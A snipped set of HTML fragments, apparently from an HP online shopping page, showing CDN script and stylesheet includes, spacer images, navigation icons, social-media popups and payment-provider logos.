...[SNIP]...
<!-- Layout change because of phonenumber shifted to head ends -->
       

<script type="text/javascript" language="JavaScript" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/newsletter_catalog_utils.js"></script>
...[SNIP]...
<td><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="6" border="0" alt=""></td>
...[SNIP]...
</style>


<script language="JavaScript" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/newsletter_catalog_utils.js"></script>
...[SNIP]...
</style>


<script language="JavaScript" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/newsletter_catalog_utils.js"></script>
...[SNIP]...
<div id="space1"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="5" alt="" longdesc=""></div>
...[SNIP]...
<a href="/webapp/shopping/product_advisor.do?landing=desktops&storeName=computer_store&jumpid=in_R329_prodexp/hhoslp/psg/desktops/leftnav_help_me_choose"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/icon_info.gif" style="vertical-align:middle;" border="0"/></a>
...[SNIP]...
ustOptionWindow', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=850,height=360,left=200,top=100')" title='Click for sales help via Chat, Phone or E-mail'/>
<img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/icon_live_assist.gif" style="vertical-align:middle;" border=0 longDesc="" alt="Click for sales help via Chat, Phone or E-mail"></a>
...[SNIP]...
elcome.hp.com/country/us/en/welcome.html#Explore?jumpid=in_R329_prodexp/hhoslp/psg/desktops/leftnav_learn_use_create"
target="LUCWindow"
title="Learn, Use, &amp; Create">
<img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/LightBulb.gif"
style="vertical-align:middle;"
border=0
longDesc=""
alt="Learn, Use, &amp; Create">

</a>
...[SNIP]...
<a href="http://www.shopping.hp.com/webapp/shopping/topRatedLanding.do"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/icon_top_rated_prod.gif" style="vertical-align:middle;" border=0 longDesc="" alt="Shop Top Rated"></a>
...[SNIP]...
<div id="space2"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="5" alt="" longdesc=""></div>
...[SNIP]...
<td><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="6" alt=""></td>
...[SNIP]...
<a href="#" onClick="window.open('http://www.facebook.com/HPhome','FacebookPopup', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=800,height=600,left=200,top=100');"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/fb_icon_25x25.gif" title="Follow us on Facebook" class="socialIcon"/></a>
...[SNIP]...
<a href="#" onClick="window.open('http://twitter.com/hpdeals','TwitterPopup', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=800,height=600,left=200,top=100');"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/twitter_icon_25x25.gif" alt="Follow us on Twitter" title="Follow us on Twitter" class="socialIcon" /></a>
...[SNIP]...
a href="#" onClick="window.open('http://h30417.www3.hp.com/p/subscribe','RSSpopup', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=630,height=600,left=200,top=100');"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/rss_icon_25x25.gif" alt="Subscribe to our RSS feed" title="Subscribe to our RSS feed" class="socialIcon" /></a>
...[SNIP]...
<td valign="top" width="10"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="10" height="1" alt="" longdesc=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="150" height="10" alt="" longdesc=""></td>
...[SNIP]...
<td><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td class="colorCCCCCCbg"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="2" alt=""></td>
...[SNIP]...
<td><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="20" alt=""></td>
...[SNIP]...
return false;" onKeyPress="javascript:openWin('https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=TEE22ETL&content=/bmlweb/hp_tnpupto6m0250rollingiw.html',510,625);return false;"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/logos/bml_logo.gif" WIDTH="150" HEIGHT="40" border="0" alt="Bill Me Later" title= "Bill Me Later" longdesc=""></a>
...[SNIP]...
.com/cgi-bin/webscr?cmd=xpt/popup/OLCWhatIsPayPal-outside', 'olcwhatispaypal', 'toolbar=no, location=no, directories=no, status=no, menubar=no, scrollbars=yes, resizable=yes, width=400, height=350');"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/logos/hp_accept_paypal_150x40.gif" WIDTH="150" HEIGHT="40" border="0" alt="Now accepting PayPal" longdesc=""></a>
...[SNIP]...
bb.org/BusinessReport.aspx?CompanyID=207934','olcwhatisbbonline', 'toolbar=no, location=no, directories=no, status=no, menubar=no, scrollbars=yes, resizable=yes, width=800, height=450');return false;"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/logos/BBBOnlineLogo.gif" WIDTH="135" HEIGHT="52" border="0" alt="BBB Accredited Business" longdesc=""></a>
...[SNIP]...
<a name="jumptocontent"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="10" height="1" alt=""></a>
...[SNIP]...
<td><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="20" border="0" alt=""><h1>
...[SNIP]...
<td width="15"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="1" alt="" longdesc=""></td>    
<td width="2" class="bold" valign="top"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="15" alt="" longdesc=""><br>
...[SNIP]...
<br><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="2" alt="" longdesc=""></td>
...[SNIP]...
<td width="15"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="20" border="0" alt=""><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/mda_white_browse_214x60.gif" title="HP recommends Windows&#0174; 7" width="214" height="60" align="center"></td>
...[SNIP]...
<!-- Layout change because of phonenumber shifted to head ends -->
       

<script language="JavaScript" src='http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/can/can_accordion.js'></script>
...[SNIP]...
<!-- RI Landing Page Changes BEGIN -->
<script language="JavaScript" src='http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/hp_ajax.js'></script>
...[SNIP]...
<!-- TODO: Relative folder for RI content may change -->
<link href="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/css/ri/all.css" rel="stylesheet" type="text/css" media="screen,print"/>
<link href="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/css/ri/all_handheld.css" rel="stylesheet" type="text/css" media="handheld"/>